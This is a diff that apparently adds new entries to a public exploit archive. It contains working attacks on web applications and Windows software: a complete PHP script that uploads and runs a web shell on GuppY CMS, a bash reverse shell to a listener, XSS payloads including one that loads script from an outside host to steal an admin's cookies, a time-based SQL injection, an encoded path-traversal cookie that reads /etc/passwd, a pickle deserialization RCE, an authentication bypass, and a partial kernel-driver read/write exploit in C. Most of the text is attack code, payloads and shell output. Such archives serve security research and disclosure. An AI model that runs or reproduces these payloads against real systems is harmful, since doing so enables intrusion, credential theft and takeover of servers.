+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: XSRF-TOKEN=eyJpdiI6IjNZbEZudjg0RXpFNEVLWHBUK0p6R1E9PSIsInZhbHVlIjoiNjFVbmZUVUJQWVdYWXJVOUVJRWVVdHN0UWtOQjJXZGRiS2N4T2lkM0VDeXFxcDRZdG1tRFVaQUk3dlhsWHRvOVQxVnQvbFhWRUJTbUllczh6MmhFUE84N1puNVFMSVFFeWdmRlJUYkdFRGdCakZ4eEJXeHllRTdFOFNPK0pLcnkiLCJtYWMiOiJhMDBlZWFiNDFlNzE2Yzc1ZjA2NzEzYzY2Y2U0ZDQ3NzdkMTI4OTY1NjA4OTNmNDE4ZDNmNWRkYzFkN2IzMWEwIiwidGFnIjoiIn0%3D;
+lavalite_session=eyJpdiI6ImxiWmVuV0xlU3ZtVWhLVW1Oc2duSEE9PSIsInZhbHVlIjoiUG5WMjhMNVppUkhST1Bta1FOd1VJUDR5ZW1lRU56bXpDTnpaVzkrUHFzQzJpKzE4YlFuNEQ2RnNlKzM2Tkg0Y2VZMExCRTBUUnRQajlpTmJCUXJjT3ZETzV6OVZveURuaTFHOHdoN3pneUR3NGhQc09OUjdKb0VreFV1Y0tuOTgiLCJtYWMiOiJlMTdlMTAyZTQ3MmMyMjZlMWE5MTkwMzc0NTU2OTFkOTlmOTM4MGVlZDE4NWU4MGNkZGM4OTllMTRmYTE3MGM1IiwidGFnIjoiJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmJTJlJTJlJTJmZXRjJTJmcGFzc3dkIn0%3d
+Upgrade-Insecure-Requests: 1
+Referer: http://pwnedhost.com/cms-master/website/public/
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+Content-Length: 0
+```
+
+[+]Response:
+
+```Request
+<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/manifest.js"></script>
+<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/vendor.js"></script>
+<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/dist/js/app.js"></script>
+<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/main.js"></script>
+<script src="http://pwnedhost.com/cms-master/website/public/themes/public/assets/js/theme.js"></script>
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/LavaLite)
+
+## Proof and Exploit:
+[href](https://streamable.com/nis1hg)
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/exploits/php/webapps/51052.txt b/exploits/php/webapps/51052.txt
new file mode 100644
index 000000000..ef8e4ce27
--- /dev/null
+++ b/exploits/php/webapps/51052.txt
@@ -0,0 +1,124 @@
+# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
+# Date: Sep 30, 2022
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://www.freeguppy.org/
+# Software Link:
+https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
+# Version: 6.00.10
+# Tested on: Linux
+
+#!/usr/bin/php
+
+<?php
+
+$username = "Admin2"; //Administrator username
+$password = "rose1337"; //Administrator password
+
+
+$options = getopt('u:c:');
+
+if(!isset($options['u'], $options['c']))
+die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
+\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
+
+\n");
+
+$target     =  $options['u'];
+
+$command    =  $options['c'];
+
+// Administrator login
+
+$cookie="cookie.txt";
+$url = "{$target}guppy/connect.php";
+
+$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
+$curlObj = curl_init();
+
+curl_setopt($curlObj, CURLOPT_URL, $url);
+curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($curlObj, CURLOPT_HEADER, 1);
+curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
+curl_setopt ($curlObj, CURLOPT_POST, 1);
+CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
+CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
+CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
+CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
+curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
+curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
+$result = curl_exec($curlObj);
+
+
+// uploading shell
+
+$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
+
+$post='------WebKitFormBoundarygA1APFcUlkIaWal4
+Content-Disposition: form-data; name="rep"
+
+file
+------WebKitFormBoundarygA1APFcUlkIaWal4
+Content-Disposition: form-data; name="ficup"; filename="shell.php"
+Content-Type: application/x-php
+
+<?php system($_GET["cmd"]); ?>
+
+------WebKitFormBoundarygA1APFcUlkIaWal4--
+';
+
+$headers = array(
+
+
+            'Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
+            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
+
+            'Accept-Encoding: gzip, deflate',
+            'Accept-Language: en-US,en;q=0.9'
+);
+curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($curlObj, CURLOPT_URL, $url2);
+curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
+curl_setopt($curlObj, CURLOPT_POST, true);
+curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
+CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
+CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
+CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
+CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
+curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
+curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
+
+$data = curl_exec($curlObj);
+
+
+// Executing the shell
+
+
+$shell = "{$target}guppy/file/shell.php?cmd=" .$command;
+curl_setopt($curlObj, CURLOPT_URL, $shell);
+curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
+application/x-www-form-urlencoded'));
+curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
+CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
+curl_setopt($curlObj, CURLOPT_HEADER, False);
+curl_setopt($curlObj, CURLOPT_POST, false);
+
+$exec_shell = curl_exec($curlObj);
+
+$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
+
+if($code != 200) {
+    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
+credentials\n";
+}
+else {
+
+print("\n");
+print($exec_shell);
+
+}
+curl_close($curlObj);
+
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/51054.txt b/exploits/php/webapps/51054.txt
new file mode 100644
index 000000000..c21d2284c
--- /dev/null
+++ b/exploits/php/webapps/51054.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)
+# Date: 2022-07-02
+# Exploit Author: Ali Alipour
+# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
+# Version: 1.0
+# Tested on: Windows 10 Pro x64 - XAMPP Server
+# CVE : CVE-2022-35155
+
+
+#Issue Detail:
+
+The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.
+
+This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
+
+# Vulnerable page: /buspassms/download-pass.php
+
+# Vulnerable Parameter: searchdata [ POST Data ]
+
+#Request :
+
+POST /buspassms/download-pass.php HTTP/1.1
+Host: 127.0.0.1
+Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3
+Origin: https://127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Upgrade-Insecure-Requests: 1
+Referer: https://127.0.0.1/buspassms/download-pass.php
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Length: 25
+
+searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=
+
+
+
+#Response :
+
+HTTP/1.1 200 OK
+Date: Fri, 01 Jul 2022 00:14:25 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8
+X-Powered-By: PHP/7.4.8
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 6425
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<title>Bus Pass Management System || Pass Page</title>
+
+<script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba
+...[SNIP]...
+<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>
+...[SNIP]...
\ No newline at end of file
diff --git a/exploits/php/webapps/51056.txt b/exploits/php/webapps/51056.txt
new file mode 100644
index 000000000..7eda71ee0
--- /dev/null
+++ b/exploits/php/webapps/51056.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
+# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
+# Date: 7th March 2022
+# CVE ID: CVE-2022-26986
+# Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above...
+# Vendor: https://www.impresscms.org
+# Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3
+
+###############################################
+#Step1- Login with Admin Credentials
+#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):
+
+POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1
+Host: 192.168.56.117
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701
+Content-Length: 1011
+Origin: http://192.168.56.117
+Connection: close
+Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1
+Cookie: tbl_SystemMimetype_sortsel=mimetypeid; tbl_limitsel=15; tbl_SystemMimetype_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3
+Upgrade-Insecure-Requests: 1
+
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="mimetypeid"
+
+1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="extension"
+
+bin
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="types"
+
+application/octet-stream
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="name"
+
+Binary File/Linux Executable
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="icms_page_before_form"
+
+http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="op"
+
+addmimetype
+-----------------------------40629177308912268471540748701
+Content-Disposition: form-data; name="modify_button"
+
+Submit
+-----------------------------40629177308912268471540748701--
+
+Vulnerable Payload:
+1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)   //time-based blind (query SLEEP)
+
+Output:
+web application technology: Apache 2.4.52, PHP 7.4.27
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+available databases [6]:
+[*] impresscms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
\ No newline at end of file
diff --git a/exploits/php/webapps/51057.txt b/exploits/php/webapps/51057.txt
new file mode 100644
index 000000000..fc10cd349
--- /dev/null
+++ b/exploits/php/webapps/51057.txt
@@ -0,0 +1,27 @@
+# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution
+# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
+# Date: 7th March 2022
+# CVE ID: CVE-2022-26982
+# Confirmed on release 2.1.1
+# Vendor: https://download.simplemachines.org/
+# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!
+
+###############################################
+#Step1- Login with Admin Credentials
+#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php
+#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>
+#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page
+#Step5- Now click on "Themes and Layout" and you will get the reverse shell:
+E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:
+
+listening on [any] 4477 ...
+connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276
+bash: cannot set terminal process group (1334): Inappropriate ioctl for device
+bash: no job control in this shell
+daemon@debian:/opt/bitnami/simplemachinesforum$ whoami
+whoami
+daemon
+daemon@debian:/opt/bitnami/simplemachinesforum$ id
+id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+daemon@debian:/opt/bitnami/simplemachinesforum$
\ No newline at end of file
diff --git a/exploits/php/webapps/51058.txt b/exploits/php/webapps/51058.txt
new file mode 100644
index 000000000..1a5b7e051
--- /dev/null
+++ b/exploits/php/webapps/51058.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution
+# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
+# Date: 3rd Mar'2022
+# CVE ID: CVE-2022-26521
+# Confirmed on release 1.3.2
+# Vendor: https://www.abantecart.com/download
+
+###############################################
+#Step1- Login with Admin Credentials
+#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
+        Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions
+#Step3- Now Goto Add Media=>Add Resource=> Upload php web shell
+#Step4- Copy the Resource URL location and execute it in the browser e.g. :
+Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell:
+
+listening on [any] 4477 ...
+connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532
+Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
+ 11:17:51 up  2:15,  1 user,  load average: 1.91, 1.93, 1.52
+USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
+bitnami  tty1     -                09:05    1:05m  0.20s  0.01s -bash
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+/bin/sh: 0: can't access tty; job control turned off
+$ whoami
+daemon
+$ id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+$
\ No newline at end of file
diff --git a/exploits/php/webapps/51059.txt b/exploits/php/webapps/51059.txt
new file mode 100644
index 000000000..514523d90
--- /dev/null
+++ b/exploits/php/webapps/51059.txt
@@ -0,0 +1,20 @@
+# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution
+# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
+# Date: 26th Feb'2022
+# CVE ID: CVE-2022-26149
+# Confirmed on release 2.8.3-pl
+# Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt
+# Vendor: https://modx.com/download
+
+###############################################
+#Step1- Login with Admin Credentials
+#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
+        Add the php file extension under the "Uploadable File Types" option available in "System Settings"
+#Step3- Now Goto Media=>Media Browser and upload the Shell.php
+#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:
+
+listening on [any] 4477 ...
+connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056
+bash: cannot set terminal process group (1445): Inappropriate ioctl for device
+bash: no job control in this shell
+daemon@debian:/opt/bitnami/modx$
\ No newline at end of file
diff --git a/exploits/php/webapps/51060.txt b/exploits/php/webapps/51060.txt
new file mode 100644
index 000000000..c724b74c2
--- /dev/null
+++ b/exploits/php/webapps/51060.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution
+# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
+# Date: 12th January,2022
+# CVE ID: CVE-2021-46360
+# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
+# Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
+# Vendor: https://compo.sr/download.htm
+
+###############################################
+#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr
+
+#!/usr/bin/python3
+import requests
+from bs4 import BeautifulSoup
+import time
+
+cookies = {
+    'has_cookies': '1',
+    'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c',                   #You need to change this as it is dynamic
+    'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',
+    'last_visit': '1641783779',
+    'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a',  #You need to change this as it is dynamic
+}
+
+headers = {
+    'Connection': 'keep-alive',
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Accept': '*/*',
+    'Origin': 'http://192.168.56.116',
+    'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',
+    'Accept-Language': 'en-US,en;q=0.9',
+}
+
+params = (
+    ('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic
+)
+
+data = {
+  '_data': 'command=rm .htaccess',  # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)
+  'csrf_token': 'ef14cc258d93a'  #You need to change this as it is dynamic
+}
+
+
+r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False)
+soup = BeautifulSoup(r.text, 'html.parser')
+#datap=response.read()
+print (soup)
+
+#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (
+#Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:
+
+┌─[ci@parrot]─[~]
+└──╼ $nc -lvvnp 4444
+listening on [any] 4444 ...
+connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
+Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
+ 13:35:13 up 20:11,  1 user,  load average: 0.00, 0.01, 0.03
+USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
+user     :0       :0               Thu17   ?xdm?  46:51   0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+/bin/sh: 0: can't access tty; job control turned off
+$ whoami
+daemon
+$ id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+$ pwd
+/
+$
\ No newline at end of file
diff --git a/exploits/php/webapps/51061.txt b/exploits/php/webapps/51061.txt
new file mode 100644
index 000000000..1b26e971d
--- /dev/null
+++ b/exploits/php/webapps/51061.txt
@@ -0,0 +1,28 @@
+Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
+# Date: 2022-10-02
+# Exploit Author: Prasheek Kamble
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
+# Version: V 1.2
+# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
+# Tested on MAC OS, XAMPP
+
+
+
+Steps to reproduce:
+
+1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
+2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
+3) Click on Add Details and intercept the request in Burpsuite
+4) After this, the details have been submitted.
+5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
+6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
+7) So attacker is sucessful in getting the victim's ip address and other details.
+
+#POC's
+
+https://ibb.co/kSxFp2g
+https://ibb.co/VvSVRsy
+https://ibb.co/mSGp4FX
+https://ibb.co/hXbJ9TZ
+https://ibb.co/M6vS08S
\ No newline at end of file
diff --git a/exploits/python/remote/51051.txt b/exploits/python/remote/51051.txt
new file mode 100644
index 000000000..19df41cca
--- /dev/null
+++ b/exploits/python/remote/51051.txt
@@ -0,0 +1,73 @@
+# Exploit Title: NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle
+# Exploit Author: Elias Hohl
+# Google Dork: N/A
+# Date: 2022-06-21
+# Vendor Homepage: https://www.nvidia.com
+# Software Link: https://github.com/NVIDIA/NVFlare
+# Version: < 2.1.4
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2022-34668
+
+https://medium.com/@elias.hohl/remote-code-execution-in-nvidia-nvflare-c140bb6a2d55
+
+There is a Remote Code Execution vulnerability https://github.com/NVIDIA/NVFlare. It is possible to execute arbitrary commands on the server for connected clients. It was not investigated if server can also execute commands on all clients (I expect this though, as it is by design required for the server to instruct the clients to execute commands if they need to train specific models). The consequence would be that a client can gain Remote Code Execution on the server an ALL connected clients.
+
+The vulnerability exists due to the deserialization of user data with the pickle module. There are multiple places where this is done, I considered line 568 on private/fed/server/fed_server.py the occurrence that is accessible with the least efforts and thus used it in my PoC-Exploit.
+
+The client generates a malicious data packet like this: aux_message.data["fl_context"].CopyFrom(bytes_to_proto(generate_payload('curl http://127.0.0.1:4321')))
+
+
+
+REPLICATION
+
+This example uses the server in poc-mode. The provision mode seems to run the same code in fed_server.py though and should be vulnerable as well. (To my understanding, the modes differ only regarding credentials).
+
+This exploit replicates the Quickstart tutorial https://nvidia.github.io/NVFlare/quickstart.html with a maliciously modified client to execute commands on the server.
+
+Make sure to use Python 3.8, the nightly builds don't work with Python >=3.9.
+
+sudo apt update
+sudo apt-get install python3-venv curl
+
+python3 -m venv nvflare-env
+
+source nvflare-env/bin/activate
+
+python3 -m pip install -U pip
+python3 -m pip install -U setuptools
+python3 -m pip install torch torchvision tensorboard
+
+git clone https://github.com/NVIDIA/NVFlare.git
+cd NVFlare
+git checkout 2.1.2
+git apply nvflare-exploit-apply.txt  # note that this only modifies the client side code
+python3 -m pip install .
+
+cd
+poc -n 2
+
+mkdir -p poc/admin/transfer
+cp -rf NVFlare/examples/* poc/admin/transfer
+
+In four separate terminals, execute (after running source nvflare-env/bin/activate in each one):
+
+./poc/server/startup/start.sh
+
+./poc/site-1/startup/start.sh
+
+./poc/site-2/startup/start.sh
+
+./poc/admin/startup/fl_admin.sh localhost
+
+In another terminal window, fire up a netcat instance to verify that Remote Code Execution is possible:
+nc -lvp 4321
+
+In the admin console, execute:
+
+check_status server
+
+to verify both clients are connected. Then:
+
+submit_job hello-pt-tb
+
+It will take a few minutes until the job finishes downloading the required files, then you should see a connection in the netcat tab and error messages in the server tab (because the received pickle payload is no data that the program can continue working with). You can also shutdown netcat, which will result in "Connection refused" errors in the server tab.
\ No newline at end of file
diff --git a/exploits/python/webapps/51041.txt b/exploits/python/webapps/51041.txt
new file mode 100644
index 000000000..026e0921a
--- /dev/null
+++ b/exploits/python/webapps/51041.txt
@@ -0,0 +1,35 @@
+# Exploit Title: "camp" Raspberry Pi camera server 1.0 -  Authentication Bypass
+# Date: 2022-07-25
+# Exploit Author: Elias Hohl
+# Vendor Homepage: https://github.com/patrickfuller
+# Software Link: https://github.com/patrickfuller/camp
+# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2022-37109
+
+"camp" Raspberry Pi camera server Authentication Bypass vulnerability
+
+https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
+
+1. Start an instance of the "camp" server:
+python3 server.py --require-login
+
+2. Fetch the SHA-512 password hash using one of these methods:
+
+curl http://localhost:8000/static/password.tx%74
+
+OR
+
+curl http://localhost:8000/static/./password.txt --path-as-is
+
+OR
+
+curl http://localhost:8000/static/../camp/password.txt --path-as-is
+
+3. Execute the following python snippet (replace the hash with the hash you received in step 2).
+
+from tornado.web import create_signed_value
+import time
+print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
+
+4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
\ No newline at end of file
diff --git a/exploits/windows/local/51044.txt b/exploits/windows/local/51044.txt
new file mode 100644
index 000000000..a3ff74ece
--- /dev/null
+++ b/exploits/windows/local/51044.txt
@@ -0,0 +1,166 @@
+/*
+# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write
+# Date: 26-09-2022
+# Exploit Author: Brandon Marshall
+# Vendor Homepage: https://www.iolo.com/
+# Tested Version   - System Mechanic version 15.5.0.61
+# Driver Version   - 5.4.11 - amp.sys
+# Tested on OS     - 64 bit Windows 10 (18362)
+# Fixed Version    - System Mechanic 17.5.0.116
+# CVE : CVE-2018-5701
+*/
+
+#include <iostream>
+#include <Windows.h>
+#include <psapi.h>
+#include <stdio.h>
+#pragma warning(disable:4996)
+
+typedef struct _kernelDriverInformation {
+    char* imageName;
+    void* imageBase;
+
+}kernelDriverInformation, * PKernelDriverInformation;
+
+typedef struct _functionInformation {
+    char* functionName;
+    void* functionOffset;
+    void* functionBase;
+
+}functionInformation, * PFunctionInformation;
+
+void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {
+    DWORD bytesReturned;
+    NTSTATUS  status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);
+}
+
+HANDLE getDeviceHandle(char* name) {
+    DWORD generic_read = 0x80000000;
+    DWORD generic_write = 0x40000000;
+    HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);
+    return handle;
+}
+
+
+
+void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {
+    byte* maliciousBuffer = (byte*)malloc(bufferSize);
+    *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5;   //   funciton pointer, this will be 5
+    *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer);   pointer to parameters
+    *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1);  pointer to write return value
+    *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown
+    *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16;  // this will be 16
+    *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0;  // param2
+    *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3
+    *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0;  // param4
+    return (void*)maliciousBuffer;
+}
+
+void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {
